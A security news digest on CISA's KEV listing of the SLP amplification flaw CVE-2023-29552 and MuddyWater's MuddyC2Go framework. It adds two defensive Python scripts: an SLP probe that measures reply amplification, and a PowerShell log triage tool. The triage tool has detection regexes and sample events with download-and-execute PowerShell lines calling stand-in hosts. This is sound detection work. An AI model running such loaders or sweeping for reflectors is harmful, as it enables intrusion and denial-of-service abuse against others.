The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity flaw in the Service Location Protocol (SLP) to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerability, tracked as CVE-2023-29552 (CVSS score: 7.5), lets an unauthenticated remote attacker register services on an exposed SLP server and then reflect the resulting oversized replies at a victim with spoofed requests, enabling massive denial-of-service (DoS) amplification attacks.
CISA has urged organizations to apply vendor fixes where they exist and otherwise to disable the SLP service (UDP and TCP port 427) on any system reachable from untrusted networks.
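Before disabling SLP, a defender wants to know which hosts actually answer it. The following Python script is an added example, not code from CISA or the original report: it builds a standard SLPv2 Service Request (RFC 2608 layout), parses the Service Reply, and reports how many bytes come back per byte sent, so a single request to a host you own shows both whether the service is exposed and how much larger its replies are than the request. The probe() function, the XID value and the constructed sample reply used to exercise the parser are assumptions for illustration.

```python
"""Build and parse SLPv2 (RFC 2608) Service Request / Service Reply messages
to check whether a host answers SLP on UDP port 427.

Added example, not CISA's or the original report's code. Field layouts follow
RFC 2608; probe(), the XID value and the constructed sample reply are
assumptions for illustration.
"""
import socket
import struct
import sys

SLP_PORT = 427
SLP_VERSION = 2
FUNC_SRVRQST, FUNC_SRVRPLY = 1, 2
FUNC_NAMES = {1: "SrvRqst", 2: "SrvRply", 3: "SrvReg", 4: "SrvDeReg", 5: "SrvAck",
              6: "AttrRqst", 7: "AttrRply", 8: "DAAdvert", 9: "SrvTypeRqst",
              10: "SrvTypeRply", 11: "SAAdvert"}


def _lstr(s: str) -> bytes:
    """Encode a 2-byte-length-prefixed SLP string."""
    b = s.encode("utf-8")
    return struct.pack("!H", len(b)) + b


def _rstr(data: bytes, off: int):
    """Decode a 2-byte-length-prefixed SLP string at off; return (string, next offset)."""
    (n,) = struct.unpack_from("!H", data, off)
    return data[off + 2:off + 2 + n].decode("utf-8", "replace"), off + 2 + n


def build_header(func_id: int, body_len: int, xid: int, lang: str = "en") -> bytes:
    """SLPv2 header: ver(1) func(1) len(3) flags(2) next-ext(3) xid(2) lang-len(2) lang."""
    total = 14 + len(lang.encode("utf-8")) + body_len
    return (bytes([SLP_VERSION, func_id]) + total.to_bytes(3, "big")
            + b"\x00\x00" + b"\x00\x00\x00" + struct.pack("!H", xid) + _lstr(lang))


def build_srvrqst(service_type: str = "service:service-agent",
                  scope: str = "DEFAULT", xid: int = 0x1234) -> bytes:
    """SrvRqst body: PRList, service-type, scope-list, predicate, SLP SPI (each length-prefixed).
    'service:service-agent' is the discovery type every service agent answers."""
    body = _lstr("") + _lstr(service_type) + _lstr(scope) + _lstr("") + _lstr("")
    return build_header(FUNC_SRVRQST, len(body), xid) + body


def parse_header(data: bytes) -> dict:
    if len(data) < 14 or data[0] != SLP_VERSION:
        raise ValueError("not an SLPv2 message")
    (flags,) = struct.unpack_from("!H", data, 5)
    (xid,) = struct.unpack_from("!H", data, 10)
    lang, body_off = _rstr(data, 12)
    return {"function_id": data[1], "function": FUNC_NAMES.get(data[1], "unknown"),
            "length": int.from_bytes(data[2:5], "big"), "overflow": bool(flags & 0x8000),
            "xid": xid, "lang": lang, "body_offset": body_off}


def parse_srvrply(data: bytes) -> dict:
    """SrvRply body: error code(2), URL count(2), then URL entries:
    reserved(1) lifetime(2) url-len(2) url auth-count(1) [auth blocks]."""
    msg = parse_header(data)
    if msg["function_id"] != FUNC_SRVRPLY:
        return msg
    off = msg["body_offset"]
    error_code, count = struct.unpack_from("!HH", data, off)
    off += 4
    urls = []
    for _ in range(count):
        (lifetime,) = struct.unpack_from("!H", data, off + 1)
        url, off = _rstr(data, off + 3)
        n_auth, off = data[off], off + 1
        for _ in range(n_auth):  # skip auth blocks using the block length at offset 2
            (blen,) = struct.unpack_from("!H", data, off + 2)
            off += blen
        urls.append({"url": url, "lifetime": lifetime, "auth_blocks": n_auth})
    msg.update({"error_code": error_code, "urls": urls})
    return msg


def build_srvrply(urls, xid: int = 0x1234, error_code: int = 0) -> bytes:
    """Constructed SrvRply without auth blocks, used to exercise the parser offline."""
    body = struct.pack("!HH", error_code, len(urls))
    for url, lifetime in urls:
        body += b"\x00" + struct.pack("!H", lifetime) + _lstr(url) + b"\x00"
    return build_header(FUNC_SRVRPLY, len(body), xid) + body


def probe(host: str, timeout: float = 2.0):
    """Send one SrvRqst to host:427/udp; return the parsed reply plus the size ratio,
    or None on timeout. Use only against hosts you are authorized to test."""
    req = build_srvrqst()
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(req, (host, SLP_PORT))
        try:
            data, _ = s.recvfrom(65535)
        except socket.timeout:
            return None
    reply = parse_srvrply(data)
    reply["bytes_out_per_byte_in"] = round(len(data) / len(req), 1)
    return reply


if __name__ == "__main__":
    print(probe(sys.argv[1]) if len(sys.argv) > 1 else "usage: slp_check.py <host>")
```

A host that returns a SrvRply with a non-zero URL list is reachable and registering services; if it does so from an untrusted network it is the reflector the CVE describes, and the size ratio is a rough measure of how attractive it is. Sweep only address ranges you own, and treat the UDP port as the thing to block rather than waiting for a reply-size threshold.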
MuddyWater Uses New C2 Framework
Security researchers at Deep Instinct have discovered a new command-and-control (C2) framework, dubbed MuddyC2Go, that the Iranian state-sponsored group MuddyWater is using in attacks against Israel. MuddyC2Go is a web-based C2 framework written in Go.
MuddyC2Go is believed to have been in use since early 2020 and has replaced PhonyC2, the group's previous custom C2 platform. It is delivered through a password-protected archive containing an executable with an embedded PowerShell script. That script connects to the MuddyC2Go server on its own, so the operator no longer has to execute anything manually on the victim.
The framework appears to be responsible for generating the PowerShell payloads used for post-exploitation activity. Deep Instinct recommends disabling PowerShell where it is not needed and, where it is needed, closely monitoring PowerShell activity (for example through script block logging).
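In practice, closely monitoring PowerShell means reading Script Block Logging events (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and picking out the blocks that fetch and run code on their own, which is the behaviour described above. The following Python triage script is an added example, not Deep Instinct's tooling and not MuddyC2Go detection content: it scores each script block against a generic list of download-and-execute and auto-connect indicators (an assumption, not a MuddyC2Go signature set) and surfaces blocks that match several at once. The sample events are constructed.

```python
"""Triage PowerShell Script Block Logging events (Event ID 4104) for script
blocks that fetch and run code from a remote host without operator interaction.

Added example, not Deep Instinct's tooling. The indicator list is a generic
assumption, not a MuddyC2Go signature set, and the sample events are constructed.
"""
import re

# Generic download-and-execute / auto-connect indicators (assumptions, not attributed to MuddyC2Go).
INDICATORS = {
    "web_client":    re.compile(r"Net\.WebClient|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.I),
    "download":      re.compile(r"Download(?:String|File|Data)", re.I),
    "raw_socket":    re.compile(r"Net\.Sockets\.(?:Tcp|Udp)Client", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "invoke_expr":   re.compile(r"Invoke-Expression|\biex\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "retry_loop":    re.compile(r"while\s*\(\s*\$true\s*\)|Start-Sleep", re.I),
}

# Constructed 4104 events: the fields an EVTX/XML export carries for each script block.
SAMPLE_EVENTS = [
    {"record_id": 101, "computer": "WS01", "path": r"C:\scripts\cleanup.ps1",
     "script_block": r"Get-ChildItem C:\logs -Recurse | Where-Object Length -gt 1MB | Remove-Item"},
    {"record_id": 102, "computer": "WS02", "path": "",
     "script_block": "Invoke-WebRequest -Uri https://intranet.example/updates.json | ConvertFrom-Json"},
    {"record_id": 103, "computer": "WS07", "path": "",
     "script_block": ("$c = New-Object Net.WebClient; while($true){ try { "
                      "$p = $c.DownloadString('http://203.0.113.7/t'); "
                      "if($p){ IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($p))) } "
                      "} catch {}; Start-Sleep -Seconds 30 }")},
    {"record_id": 104, "computer": "WS07", "path": r"C:\Users\Public\u.ps1",
     "script_block": (r"Start-Process powershell.exe -WindowStyle hidden -ArgumentList '-NoProfile -File C:\Users\Public\u.ps1'; "
                      "$t = New-Object Net.Sockets.TcpClient('203.0.113.9', 443)")},
]


def score_script_block(text: str) -> list:
    """Names of the indicators matched in one script block, in INDICATORS order."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def triage_events(events, threshold: int = 2) -> list:
    """Return events matching at least `threshold` indicators, strongest first.
    One indicator on its own (a lone Invoke-WebRequest) is everyday admin work;
    several in the same block is what a self-connecting loader looks like."""
    hits = []
    for ev in events:
        matched = score_script_block(ev["script_block"])
        if len(matched) >= threshold:
            hits.append({"record_id": ev["record_id"], "computer": ev["computer"],
                         "path": ev.get("path") or "(interactive/unsaved)",
                         "indicators": matched})
    return sorted(hits, key=lambda h: len(h["indicators"]), reverse=True)


if __name__ == "__main__":
    for h in triage_events(SAMPLE_EVENTS):
        print(f"{h['computer']} record {h['record_id']} {h['path']}: {', '.join(h['indicators'])}")
```

Script Block Logging has to be switched on first (the "Turn on PowerShell Script Block Logging" policy); once it is, real input for this script comes from an export of the 4104 events, for example via Get-WinEvent on the Microsoft-Windows-PowerShell/Operational log, and the indicator list should be tuned against your own admin scripts before alerting on it.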
Both items matter: CVE-2023-29552 gives attackers a cheap amplification vector built from any organization's exposed SLP endpoints, and MuddyC2Go shows a capable state-sponsored actor refreshing its tooling for use against high-value targets.
Organizations should patch or disable SLP, restrict and monitor PowerShell, and keep up with current threat intelligence so that new KEV entries and tooling changes like this one are acted on promptly. In short:
- Patch the SLP vulnerability (CVE-2023-29552) immediately.
- Disable the SLP service on systems running on untrusted networks.
- Disable PowerShell if it is not needed.
- Closely monitor PowerShell activity.
- Block UDP and TCP port 427 at the network edge, and track CISA's KEV catalog for newly added vulnerabilities.